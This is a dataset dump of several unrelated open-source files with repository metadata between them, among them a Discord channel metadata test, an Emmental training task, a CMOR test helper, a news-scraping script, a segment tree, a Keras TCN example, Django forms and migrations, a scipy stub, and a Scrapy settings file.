        auto_archive_after = old_auto_archive_after,
        open = old_open,
        owner_id = old_owner_id,
        slowmode = old_slowmode,
    )

    keyword_parameters = {
        'name': new_name,
        'parent_id': new_parent_id,
        'created_at': new_created_at,
        'archived': new_archived,
        'archived_at': new_archived_at,
        'auto_archive_after': new_auto_archive_after,
        'open': new_open,
        'owner_id': new_owner_id,
        'slowmode': new_slowmode,
    }
    copy = channel_metadata.copy_with_keyword_parameters(keyword_parameters)
    _assert_fields_set(copy)
    vampytest.assert_is_not(copy, channel_metadata)
    vampytest.assert_eq(keyword_parameters, {})

    vampytest.assert_eq(copy.name, new_name)
    vampytest.assert_eq(copy.parent_id, new_parent_id)
    vampytest.assert_eq(copy._created_at, new_created_at)
    vampytest.assert_eq(copy.archived, new_archived)
    vampytest.assert_eq(copy.archived_at, new_archived_at)
    vampytest.assert_eq(copy.auto_archive_after, new_auto_archive_after)
    vampytest.assert_eq(copy.open, new_open)
    vampytest.assert_eq(copy.owner_id, new_owner_id)
    vampytest.assert_eq(copy.slowmode, new_slowmode)
|
[
"re.ism.tm@gmail.com"
] |
re.ism.tm@gmail.com
|
2f716cb7b50e626cfc3fb1549ff0e4f0ef60f3e3
|
eaaecada4c78c899bfdb6a83aaf66502a7d4bc4c
|
/data_augmentation/eda/image/task.py
|
b35e6ade3e8418844f9ba5b2dd23402bc1d86d19
|
[
"MIT"
] |
permissive
|
simran-arora/emmental-tutorials
|
72552d6bcb3311e011f99fa6d164fa619c913283
|
249a82a57be58e960408a45e2e0daa72980d210a
|
refs/heads/master
| 2022-12-01T20:12:55.613955
| 2020-08-13T08:16:12
| 2020-08-13T08:16:12
| 286,825,852
| 0
| 0
|
MIT
| 2020-08-11T19:01:59
| 2020-08-11T19:01:58
| null |
UTF-8
|
Python
| false
| false
| 2,621
|
py
|
import logging
from functools import partial

import numpy as np
import torch
import torch.nn.functional as F
from emmental.scorer import Scorer
from emmental.task import EmmentalTask
from torch import nn

from eda.image.config import TASK_INPUT_SIZE, TASK_METRIC, TASK_NUM_CLASS
from eda.image.models import ALL_MODELS
from eda.image.modules.soft_cross_entropy_loss import SoftCrossEntropyLoss

logger = logging.getLogger(__name__)

SCE = SoftCrossEntropyLoss(reduction="none")


def sce_loss(module_name, intermediate_output_dict, Y, active):
    if len(Y.size()) == 1:
        label = intermediate_output_dict[module_name][0].new_zeros(
            intermediate_output_dict[module_name][0].size()
        )
        label.scatter_(1, Y.view(Y.size()[0], 1), 1.0)
    else:
        label = Y
    return SCE(intermediate_output_dict[module_name][0][active], label[active])


def output_classification(module_name, immediate_output_dict):
    return F.softmax(immediate_output_dict[module_name][0], dim=1)


def create_task(args):
    task_name = args.task
    n_class = TASK_NUM_CLASS[args.task]

    if args.model in ["wide_resnet"]:
        feature_extractor = ALL_MODELS[args.model](
            args.wide_resnet_depth,
            args.wide_resnet_width,
            args.wide_resnet_dropout,
            n_class,
            has_fc=False,
        )
        n_hidden_dim = feature_extractor(
            torch.randn(TASK_INPUT_SIZE[args.task])
        ).size()[-1]
    elif args.model == "mlp":
        n_hidden_dim = args.mlp_hidden_dim
        input_dim = np.prod(TASK_INPUT_SIZE[args.task])
        feature_extractor = ALL_MODELS[args.model](
            input_dim, n_hidden_dim, n_class, has_fc=False
        )
    else:
        raise ValueError(f"Invalid model {args.model}")

    loss = sce_loss
    output = output_classification

    logger.info(f"Built model: {feature_extractor}")

    return EmmentalTask(
        name=args.task,
        module_pool=nn.ModuleDict(
            {
                "feature": feature_extractor,
                f"{task_name}_pred_head": nn.Linear(n_hidden_dim, n_class),
            }
        ),
        task_flow=[
            {"name": "feature", "module": "feature", "inputs": [("_input_", "image")]},
            {
                "name": f"{task_name}_pred_head",
                "module": f"{task_name}_pred_head",
                "inputs": [("feature", 0)],
            },
        ],
        loss_func=partial(loss, f"{task_name}_pred_head"),
        output_func=partial(output, f"{task_name}_pred_head"),
        scorer=Scorer(metrics=TASK_METRIC[task_name]),
    )
|
[
"senwu@cs.stanford.edu"
] |
senwu@cs.stanford.edu
|
dd93ddbc2c6ada0eec838318e43428eb9841c4f1
|
e19ddf30bf87a4efdc449fa49b9621ca1460a515
|
/castle/theme/interfaces.py
|
5d42e09dbd195823850c02a445e872c1457cc0c0
|
[] |
no_license
|
castlecms/castle.theme
|
a220d25b1cf40fa47fb4af9be3cfa8d6a1cc75c9
|
4a36537ddc4db59ea2902a71e544f5a319a5a15c
|
refs/heads/master
| 2022-11-02T10:53:04.758867
| 2020-02-21T21:28:10
| 2020-02-21T21:28:10
| 72,666,053
| 5
| 3
| null | 2022-10-05T11:20:53
| 2016-11-02T17:47:59
|
CSS
|
UTF-8
|
Python
| false
| false
| 209
|
py
|
from zope.interface import Interface


class ICustomTheme(Interface):
    """Marker interface that defines a Zope 3 browser layer.
    """


class IUtils(Interface):

    def get_folder_section():
        pass
|
[
"vangheem@gmail.com"
] |
vangheem@gmail.com
|
911fe05a24b4aea8350196fde947b9a287d1e07d
|
638af6b8c580eeae23fc1034882c4b514195137a
|
/Packages/cmor/Test/test_python_common.py
|
c4566b2f070f86cc7058dd832773ef15518464f7
|
[] |
no_license
|
doutriaux1/uvcdat
|
83684a86b514b8cac4d8900a503fc13d557fc4d2
|
37e9635f988696c346b4c3cdb49144d1e21dab5d
|
refs/heads/master
| 2021-01-17T07:57:22.897539
| 2015-02-02T22:52:12
| 2015-02-02T22:52:12
| 14,878,320
| 1
| 0
| null | 2015-02-19T20:54:25
| 2013-12-02T23:44:46
|
C
|
UTF-8
|
Python
| false
| false
| 4,668
|
py
|
import numpy
# this test tries to mimic ippc_test_code.c but from python
# This one is using direct C calls from python not the python around it
ntimes=2
lon=4
lat=3
lev=5
lev2=17
varin3d=["CLOUD", "U", "T" ];
# /* Units appropriate to my data */
units3d=["%", "m s-1", "K"];
# /* Corresponding IPCC Table A1c entry (variable name) */
entry3d=["cl","ua","ta"];
# /* My variable names for IPCC Table A1a fields */
varin2d=[ "LATENT","TSURF","SOIL_WET","PSURF" ];
# /* Units appropriate to my data */
units2d=[ "W m-2","K","kg m-2","Pa"];
positive2d=["down"," ", " ", " "];
# /* Corresponding IPCC Table A1a entry (variable name) */
entry2d=["hfls", "tas","mrsos","ps"];
def gen_irreg_grid(lon,lat):
lon0 = 280.
lat0=0.;
delta_lon = 10.;
delta_lat = 10.;
y = numpy.arange(lat)
x = numpy.arange(lon)
lon_coords = numpy.zeros((lat,lon))
lat_coords = numpy.zeros((lat,lon))
lon_vertices = numpy.zeros((lat,lon,4))
lat_vertices = numpy.zeros((lat,lon,4))
    for j in range(lat): # really poor coding i know
for i in range(lon): # getting worse i know
lon_coords[j,i] = lon0+delta_lon*(j+1+i);
lat_coords[j,i] = lat0+delta_lat*(j+1-i);
lon_vertices[j,i,0] = lon_coords[j,i]-delta_lon;
lon_vertices[j,i,1] = lon_coords[j,i];
lon_vertices[j,i,2] = lon_coords[j,i]+delta_lon;
lon_vertices[j,i,3] = lon_coords[j,i];
## !!$ /* vertices lat */
lat_vertices[j,i,0] = lat_coords[j,i];
lat_vertices[j,i,1] = lat_coords[j,i]-delta_lat;
lat_vertices[j,i,2] = lat_coords[j,i];
lat_vertices[j,i,3] = lat_coords[j,i]+delta_lat;
return x,y,lon_coords,lat_coords,lon_vertices,lat_vertices
# read_data funcs are highly unoptimized....
def read_coords(lon,lat,lev):
alons = numpy.zeros(lon)
bnds_lon = numpy.zeros(2*lon)
alats = numpy.zeros(lat)
bnds_lat = numpy.zeros(2*lat)
plevs = numpy.zeros(lev,dtype='i')
for i in range(lon):
alons[i] = i*360./lon
bnds_lon[2*i] = (i - 0.5)*360./lon
bnds_lon[2*i+1] = (i + 0.5)*360./lon
for i in range(lat):
alats[i] = (lat-i)*10
bnds_lat[2*i] = (lat-i)*10 + 5.
bnds_lat[2*i+1] = (lat-i)*10 - 5.
plevs = numpy.array([100000., 92500., 85000., 70000.,
60000., 50000., 40000., 30000., 25000., 20000.,
15000., 10000., 7000., 5000., 3000., 2000., 1000.])
return alats, alons, plevs, bnds_lat, bnds_lon
def read_time(it):
time = [0]
time_bnds=[0,0]
time[0] = (it-0.5)*30.;
time_bnds[0] = (it-1)*30.;
time_bnds[1] = it*30.;
time[0]=it;
time_bnds[0] = it;
time_bnds[1] = it+1;
return time[0],numpy.array(time_bnds)
def read_3d_input_files(it, varname, n0, n1, n2, ntimes):
if varname=="CLOUD":
factor = 0.1;
offset = -50.;
elif varname=="U":
factor = 1.
offset = 100.
elif varname=="T":
factor = 0.5;
offset = -150.;
field = numpy.zeros((n2,n1,n0),dtype='d')
for k in range(n2):
for j in range(n1):
for i in range(n0):
field[k,j,i] = (k*64 + j*16 + i*4 + it)*factor - offset;
return field
def read_2d_input_files(it, varname, n0, n1):
if varname=="LATENT":
factor = 1.25;
offset = 100.;
elif varname == "TSURF":
factor = 2.0;
offset = -230.;
elif varname=="SOIL_WET":
factor = 10.;
offset = 0.;
elif varname == "PSURF":
factor = 1.;
offset = -9.7e2;
field = numpy.zeros((n0,n1),dtype='d')
for j in range(n0):
for i in range(n1):
tmp = (j*16. + i*4. + it)*factor - offset;
field[j,i] = tmp;
return field
alats, alons, plevs, bnds_lat, bnds_lon = read_coords(lon,lat,lev);
Time = numpy.zeros(ntimes,dtype='d')
bnds_time = numpy.zeros(ntimes*2,dtype='d')
Time[0],bnds_time[0:2] = read_time(0)
Time[1],bnds_time[2:4] = read_time(1)
zlevs = numpy.zeros(5,dtype='d')
zlevs[0]=0.1999999999999999999;
zlevs[1]= 0.3;
zlevs[2]=0.55;
zlevs[3]= 0.7;
zlevs[4] = 0.99999999;
zlev_bnds = numpy.zeros(6,dtype='d')
zlev_bnds[0] = 0.
zlev_bnds[1] = 0.2
zlev_bnds[2] = 0.42
zlev_bnds[3] = 0.62
zlev_bnds[4] = 0.8
zlev_bnds[5] = 1.
regions = numpy.array(["atlantic_arctic_ocean", "indian_pacific_ocean", "pacific_ocean", "global_ocean", "sf_bay"])
a_coeff=numpy.array([ 0.1, 0.2, 0.3, 0.22, 0.1 ])
b_coeff=numpy.array([ 0.0, 0.1, 0.2, 0.5, 0.8 ])
p0= numpy.array([1.e5,])
a_coeff_bnds=numpy.array([0.,.15, .25, .25, .16, 0.])
b_coeff_bnds=numpy.array([0.,.05, .15, .35, .65, 1.])
|
[
"doutriaux1@llnl.gov"
] |
doutriaux1@llnl.gov
|
252a5265eda2101371d397eb500378a31d787fa2
|
2e356d3be3eb83ef89317a7804e8fa4567898d6f
|
/chapter1/code/metadata/extract_articles.py
|
fca044b690428e12f7d91aeeee034f30287dd60e
|
[
"MIT"
] |
permissive
|
PacktPublishing/Advanced-Web-Scraping-with-Python
|
91069bbf925e142ee64e8c80ae97c28077def052
|
6624b71b2889a6fcfa3f080a6e15b979e582cce6
|
refs/heads/master
| 2021-07-09T10:29:35.394560
| 2021-01-21T07:12:34
| 2021-01-21T07:12:34
| 213,933,836
| 17
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import newspaper
cnn_paper = newspaper.build('http://cnn.com')
print('*****************************category urls************************************\n')
for category in cnn_paper.category_urls():
print(category)
print('*****************************url articles************************************\n')
for article in cnn_paper.articles:
print(article.url)
print('*****************************download first article************************************\n')
cnn_article = cnn_paper.articles[0]
cnn_article.download()
cnn_article.parse()
cnn_article.nlp()  # required before keywords and summary are available
#print(cnn_article.html)
print(cnn_article.text)
print(cnn_article.keywords)
print(cnn_article.summary)
print(cnn_article.authors)
print(cnn_article.publish_date)
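# Added tip (hedged): newspaper caches previously seen articles between
# runs, so the article list can come back empty on a repeat run; building
# with newspaper.build('http://cnn.com', memoize_articles=False) disables
# that cache.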
|
[
"jose-manuel.ortega-candel@capgemini.com"
] |
jose-manuel.ortega-candel@capgemini.com
|
940e980bebc322bec60c56ff452cc02f1fa66e97
|
f9033131dc4d66ede2c5c22fcaa4a0be5b682152
|
/SegmentTrees/Tasks/eolymp(2941).py
|
3ebde2e3290bba8960436b76b06836cf33e41562
|
[] |
no_license
|
Invalid-coder/Data-Structures-and-algorithms
|
9bd755ce3d4eb11e605480db53302096c9874364
|
42c6eb8656e85b76f1c0043dcddc9c526ae12ba1
|
refs/heads/main
| 2023-04-29T08:40:34.661184
| 2021-05-19T10:57:37
| 2021-05-19T10:57:37
| 301,458,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,112
|
py
|
#https://www.e-olymp.com/uk/submissions/7648758
from math import log2, ceil
class SegmentTree:
    ''' Segment tree with a sum operation.'''
def __init__(self, array):
k = len(array)
n = 1 << ceil(log2(k))
self.items = n * [0] + array + (n - k) * [0]
for i in range(n - 1, 0, -1):
            # Compute each parent's aggregate value
self.items[i] = self.items[i * 2] + self.items[i * 2 + 1]
self.size = n
def update(self, i, item):
        ''' Replaces the array element at position i (zero-based) with item.'''
i += self.size
self.items[i] = item
        while i != 1:  # Until we reach the root
            i = i // 2  # Take the parent's index
            # Recompute its aggregate value
self.items[i] = self.items[i * 2] + self.items[i * 2 + 1]
def sum(self, left, right):
        ''' Returns the sum of the elements on the segment.'''
left += self.size
right += self.size
result = 0
while left <= right:
            if left % 2 == 1:  # If it is a right child
result += self.items[left]
            if right % 2 == 0:  # If it is a left child
result += self.items[right]
            left = (left + 1) // 2  # Take the parent index of the node on the right
            right = (right - 1) // 2  # Take the parent index of the node on the left
return result
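# A minimal usage sketch of the class above (values are illustrative only):
#   tree = SegmentTree([5, 2, 4, 1])
#   tree.sum(0, 3)     # -> 12  (5 + 2 + 4 + 1)
#   tree.update(1, 7)  # the array becomes [5, 7, 4, 1]
#   tree.sum(0, 1)     # -> 12  (5 + 7)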
if __name__ == '__main__':
with open('input.txt') as inp:
n, q = map(int, inp.readline().split())
array = list(map(int, inp.readline().split()))
tree = SegmentTree(array)
for _ in range(q):
command = inp.readline().split()
if command[0] == '=':
tree.update(int(command[1]) - 1, int(command[2]))
elif command[0] == '?':
print(tree.sum(int(command[1]) - 1, int(command[2]) - 1))
|
[
"gusevvovik@gmail.com"
] |
gusevvovik@gmail.com
|
311e5628fc15ce4639452642b0f5bc2cc980bb8d
|
b5ce6908490cfb8e6a1e1cbe4745d675122ddce0
|
/questions/single-element-in-a-sorted-array/Solution.py
|
3654674cf86e3e46733b7d40cc107476d78e5504
|
[
"MIT"
] |
permissive
|
franklingu/leetcode-solutions
|
8895910f13208e1d8e604100d84c2dd35684cde4
|
7ad7e5c1c040510b7b7bd225ed4297054464dbc6
|
refs/heads/master
| 2023-01-09T01:34:08.097518
| 2023-01-02T02:05:35
| 2023-01-02T02:05:35
| 43,345,677
| 155
| 66
|
MIT
| 2020-10-02T03:41:36
| 2015-09-29T04:54:38
|
Python
|
UTF-8
|
Python
| false
| false
| 839
|
py
|
"""
You are given a sorted array consisting of only integers where every element appears exactly twice, except for one element which appears exactly once. Find this single element that appears only once.
Follow up: Your solution should run in O(log n) time and O(1) space.
Example 1:
Input: nums = [1,1,2,3,3,4,4,8,8]
Output: 2
Example 2:
Input: nums = [3,3,7,7,10,11,11]
Output: 10
Constraints:
1 <= nums.length <= 10^5
0 <= nums[i] <= 10^5
"""
class Solution:
def singleNonDuplicate(self, nums: List[int]) -> int:
low = 0
high = len(nums) - 1
while low < high:
mid = (low + high)//2
if mid%2 ==0:
mid +=1
if nums[mid] == nums[mid - 1]:
low = mid + 1
else:
high = mid - 1
return nums[low]
|
[
"franklingujunchao@gmail.com"
] |
franklingujunchao@gmail.com
|
b6c5a444d53fac0f7a74a29f4133549428f0157a
|
c3a0d8cc1e386717dffd93d0eb58bec752e26b0a
|
/test787-keras_block/main.py
|
9503c190eb670d02b58aab4d7b06af569f387d96
|
[] |
no_license
|
matthiaswh/bit4
|
0ce0e385d889a30620426bc60aa47de0ecef21de
|
0633d7357d157b5f47c70091dc676dc2e06c1ae1
|
refs/heads/master
| 2022-11-10T07:44:28.706805
| 2020-06-21T13:12:26
| 2020-06-21T13:12:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,152
|
py
|
import keras
import keras.backend as K
import keras.layers as L
import numpy as np
from layers import LayerBlock, Module
# Weight regularization works but batch normalization does not work!
def main():
tcn = TCN(10, kernel_size=5, dilation_rates=[1, 2, 4, 8, 16])
model = keras.Sequential(
[
L.InputLayer((100, 2)),
tcn,
L.Dense(1, activation="sigmoid"),
]
)
model.summary()
model.compile(
loss="binary_crossentropy",
optimizer=keras.optimizers.Adam(0.01),
metrics=["accuracy", "binary_crossentropy"],
)
X = np.random.uniform(-1, 1, size=(5000, 100, 2))
a = np.mean(X[:, :50, 0] + X[:, 50:, 1], axis=1)
b = np.mean(X[:, :50, 1] + X[:, 50:, 0], axis=1)
y = a < b
model.fit(X, y, batch_size=100, epochs=10, validation_split=0.1)
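# Added note: with kernel_size=5 and dilation rates 1, 2, 4, 8 and 16, each
# residual step widens the receptive field by (5 - 1) * d, giving a total of
# 1 + 4 * (1 + 2 + 4 + 8 + 16) = 125 steps, which covers the 100-step input.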
class TCN(Module):
def __init__(self, encoding_dim, kernel_size, dilation_rates, **kwargs):
super().__init__(**kwargs)
self.frontend = L.Dense(encoding_dim, kernel_regularizer="l2", name="frontend")
self.tcn_steps = LayerBlock(name="steps")
for i, d in enumerate(dilation_rates):
step = LayerBlock(residual=True, name=f"step{i + 1}")
step.add(
L.Conv1D(
encoding_dim,
kernel_size,
dilation_rate=d,
padding="same",
activation="elu",
kernel_constraint=keras.constraints.MaxNorm(1),
)
)
self.tcn_steps.add(step)
self.pool = L.GlobalAveragePooling1D(name="pool")
def build(self, input_shape):
self.frontend.build(input_shape)
encoding_shape = self.frontend.compute_output_shape(input_shape)
self.tcn_steps.build(encoding_shape)
self.pool.build(encoding_shape)
super().build(input_shape)
def compute_output_shape(self, input_shape):
return input_shape[0], self.frontend.units
def call(self, x):
return self.pool(self.tcn_steps(self.frontend(x)))
if __name__ == "__main__":
main()
|
[
"snsinfu@gmail.com"
] |
snsinfu@gmail.com
|
3936237e41a796d8b7cea9c0aef0a060bba62c82
|
97d5efaf0e15c537d4380ae3b61b88ee3d8e84ab
|
/MiSeguroVirtualBackend/insurances/migrations/0013_userpolicy_adviser_cellphone.py
|
01562d2fd74b1024f2331ea628035c909f6ab024
|
[] |
no_license
|
dmontoya1/mi-seguro-virtual
|
af49f0d4492264cea23b6d50a2a2b27c9816e843
|
6e14fb5e38b3a7192e532a46b842d6a2f80d5ea7
|
refs/heads/master
| 2023-05-06T07:43:16.335977
| 2019-04-03T17:57:32
| 2019-04-03T17:57:32
| 371,432,047
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
# Generated by Django 2.0.6 on 2018-12-18 03:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('insurances', '0012_auto_20181206_2028'),
]
operations = [
migrations.AddField(
model_name='userpolicy',
name='adviser_cellphone',
field=models.CharField(blank=True, help_text='Agregar en caso de que aplique', max_length=255, verbose_name='Celular asesor'),
),
]
|
[
"dmontoya@apptitud.com.co"
] |
dmontoya@apptitud.com.co
|
5bbb725cb6a7f41b724a108f31fc041271cc5ebc
|
41ea088695ed956ef8c6e34ace4d8ab19c8b4352
|
/XDG_CACHE_HOME/Microsoft/Python Language Server/stubs.v1/ebnjyiNMGOHuosJ_EE7SGKALWfhDqU3P4hGf55ouVTM=/_sparsetools.cpython-37m-x86_64-linux-gnu.pyi
|
d5f00fb6c5fb347fd16db47ae3c4ea852c2c1bd8
|
[] |
no_license
|
ljbelenky/decline
|
d5c1d57fd927fa6a8ea99c1e08fedbeb83170d01
|
432ef82a68168e4ac8635a9386af2aa26cd73eef
|
refs/heads/master
| 2021-06-18T17:01:46.969491
| 2021-04-26T18:34:55
| 2021-04-26T18:34:55
| 195,559,200
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,625
|
pyi
|
__doc__ = None
__file__ = '/home/land/.local/lib/python3.7/site-packages/scipy/sparse/_sparsetools.cpython-37m-x86_64-linux-gnu.so'
__name__ = 'scipy.sparse._sparsetools'
__package__ = 'scipy.sparse'
def bsr_diagonal():
pass
def bsr_eldiv_bsr():
pass
def bsr_elmul_bsr():
pass
def bsr_ge_bsr():
pass
def bsr_gt_bsr():
pass
def bsr_le_bsr():
pass
def bsr_lt_bsr():
pass
def bsr_matmat_pass2():
pass
def bsr_matvec():
pass
def bsr_matvecs():
pass
def bsr_maximum_bsr():
pass
def bsr_minimum_bsr():
pass
def bsr_minus_bsr():
pass
def bsr_ne_bsr():
pass
def bsr_plus_bsr():
pass
def bsr_scale_columns():
pass
def bsr_scale_rows():
pass
def bsr_sort_indices():
pass
def bsr_tocsr():
pass
def bsr_transpose():
pass
def coo_matvec():
pass
def coo_tocsr():
pass
def coo_todense():
pass
def cs_graph_components():
pass
def csc_diagonal():
pass
def csc_eldiv_csc():
pass
def csc_elmul_csc():
pass
def csc_ge_csc():
pass
def csc_gt_csc():
pass
def csc_le_csc():
pass
def csc_lt_csc():
pass
def csc_matmat_pass1():
pass
def csc_matmat_pass2():
pass
def csc_matvec():
pass
def csc_matvecs():
pass
def csc_maximum_csc():
pass
def csc_minimum_csc():
pass
def csc_minus_csc():
pass
def csc_ne_csc():
pass
def csc_plus_csc():
pass
def csc_tocsr():
pass
def csr_column_index1():
pass
def csr_column_index2():
pass
def csr_count_blocks():
pass
def csr_diagonal():
pass
def csr_eldiv_csr():
pass
def csr_eliminate_zeros():
pass
def csr_elmul_csr():
pass
def csr_ge_csr():
pass
def csr_gt_csr():
pass
def csr_has_canonical_format():
pass
def csr_has_sorted_indices():
pass
def csr_le_csr():
pass
def csr_lt_csr():
pass
def csr_matmat_pass1():
pass
def csr_matmat_pass2():
pass
def csr_matvec():
pass
def csr_matvecs():
pass
def csr_maximum_csr():
pass
def csr_minimum_csr():
pass
def csr_minus_csr():
pass
def csr_ne_csr():
pass
def csr_plus_csr():
pass
def csr_row_index():
pass
def csr_row_slice():
pass
def csr_sample_offsets():
pass
def csr_sample_values():
pass
def csr_scale_columns():
pass
def csr_scale_rows():
pass
def csr_sort_indices():
pass
def csr_sum_duplicates():
pass
def csr_tobsr():
pass
def csr_tocsc():
pass
def csr_todense():
pass
def dia_matvec():
pass
def expandptr():
pass
def get_csr_submatrix():
pass
def test_throw_error():
pass
|
[
"ljbelenky@gmail.com"
] |
ljbelenky@gmail.com
|
4b1eb52decc3b5781a44abbeb0ef755e29c9aa0e
|
c84a561927ff9c6712e521c3448531f4992f41fb
|
/AlgorithmicHeights/INV/inv.py
|
7999bdddb37a864f597dba8e6627368d857f4743
|
[] |
no_license
|
Meng-Gen/rosalind
|
55c174005807d0fc8703e62f7358f4ed205f977d
|
3cf5e0ee1536e3e762ddd5354b8da4c8d378a640
|
refs/heads/master
| 2020-05-13T15:47:13.504360
| 2013-12-29T12:15:27
| 2013-12-29T12:15:27
| 15,453,371
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,579
|
py
|
import sys
def read_dataset():
lines = [line.strip() for line in sys.stdin.readlines()]
n = int(lines[0])
array = list(map(int, lines[1].split()))
assert(n == len(array))
return n, array
class CountingInversionProblem():
def __init__(self, size, array):
self.size = size
self.array = [None] + array
def solve(self):
return self.count(1, self.size)
def count(self, left, right):
if left >= right:
return 0
middle = (left + right) // 2
return self.count(left, middle) + self.count(middle + 1, right) + self.merge(left, middle, right)
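    # Added note: merge() counts cross-half inversions while merging --
    # whenever an element of L is placed, the j - 1 elements of R consumed
    # so far are all smaller than it, hence the rv += (j - 1) bookkeeping.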
def merge(self, left, middle, right):
m = middle - left + 1
n = right - middle
L = [None] + self.array[left:middle+1]
R = [None] + self.array[middle+1:right+1]
rv = 0
i, j, k = 1, 1, left
while i <= m and j <= n:
if L[i] <= R[j]:
self.array[k] = L[i]
i += 1
rv += (j - 1)
else:
self.array[k] = R[j]
j += 1
k += 1
if i > m:
for y in range(j, n + 1):
self.array[middle + y] = R[y]
else:
for x in range(i, m + 1):
self.array[right - m + x] = L[x]
rv += (j - 1)*(m - i + 1)
return rv
def main():
n, array = read_dataset()
    problem = CountingInversionProblem(n, array)
print(problem.solve())
if __name__ == '__main__':
sys.exit(main())
|
[
"plover@gmail.com"
] |
plover@gmail.com
|
f955924de40322655374d0ebcb1737d4c9f84630
|
db0e8aa3a92a30c9b1cc8da03725e951ff64f3f1
|
/app1/forms.py
|
744896064b952f02b93b044a8985999dd061a2d9
|
[
"BSD-3-Clause"
] |
permissive
|
shrey-c/DataLeakageDjango
|
ffeef61caa347520747fc70cf3f7f8b84a9610cf
|
a827c5a09e5501921f9fb97b656755671238dd63
|
refs/heads/master
| 2022-11-30T03:30:12.313025
| 2020-07-12T06:47:44
| 2020-07-12T06:47:44
| 242,569,637
| 6
| 1
|
BSD-3-Clause
| 2022-11-22T05:20:22
| 2020-02-23T18:33:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,729
|
py
|
from django import forms
from app1.models import Document, DetectorUpload
class ChangepwdForm(forms.Form):
def __init__(self, *args, **kwargs):
super(ChangepwdForm, self).__init__(*args, **kwargs)
self.fields['current'].widget.attrs = {
'class' : 'form-control',
'placeholder' : 'Current Password'
}
self.fields['new'].widget.attrs = {
'class' : 'form-control',
'placeholder' : 'New Password'
}
self.fields['reenter'].widget.attrs = {
'class' : 'form-control',
'placeholder' : 'Re-enter Password'
}
current = forms.CharField(max_length=50, widget=forms.PasswordInput)
new = forms.CharField(max_length=50, widget=forms.PasswordInput)
reenter = forms.CharField(max_length=50, widget=forms.PasswordInput)
class DocumentForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(DocumentForm, self).__init__(*args, **kwargs)
self.fields['title'].widget.attrs = {
'class': 'form-control',
'placeholder': 'title'
}
self.fields['description'].widget.attrs = {
'class': 'form-control',
'placeholder': 'description'
}
self.fields['accesslevel'].widget.attrs = {
'class': 'form-control',
'placeholder': 'accesslevel',
}
title = forms.CharField(max_length=50)
description = forms.CharField(max_length=500)
accesslevel = forms.CharField(max_length=50)
document = forms.FileField()
class Meta:
model = Document
fields = ('title','description', 'accesslevel', 'document')
class DetectorUploadForm(forms.ModelForm):
document = forms.FileField()
class Meta:
model = DetectorUpload
        fields = ('document',)
|
[
"shreyansh.chheda@gmail.com"
] |
shreyansh.chheda@gmail.com
|
a717be30c5eafe7027a31daef6d7c4b751ab3056
|
7ef2308e51d1d5700fbd092177ee15e2a03ebdd8
|
/WorkLean/Python/Scrapy/testCrawler1_0/testCrawler1_0/settings.py
|
9a35f942f04500c15cbc5e210353e021980e8568
|
[] |
no_license
|
STAWZW/STAWZW1.0
|
741002eb35c2883e5739fee8d14ff430e9622c01
|
a835ac27aba17f968116e321bd201b26c9fb3578
|
refs/heads/master
| 2020-07-21T20:21:59.753992
| 2019-09-26T09:21:28
| 2019-09-26T09:21:28
| 206,965,347
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,037
|
py
|
# -*- coding: utf-8 -*-
# import random
# Scrapy settings for testCrawler1_0 project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'testCrawler1_0'
SPIDER_MODULES = ['testCrawler1_0.spiders']
NEWSPIDER_MODULE = 'testCrawler1_0.spiders'
# User-defined user-agent pool
# USER_AGENT_LIST = [
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
# "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
# "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
# "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
# "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
# "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
# "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
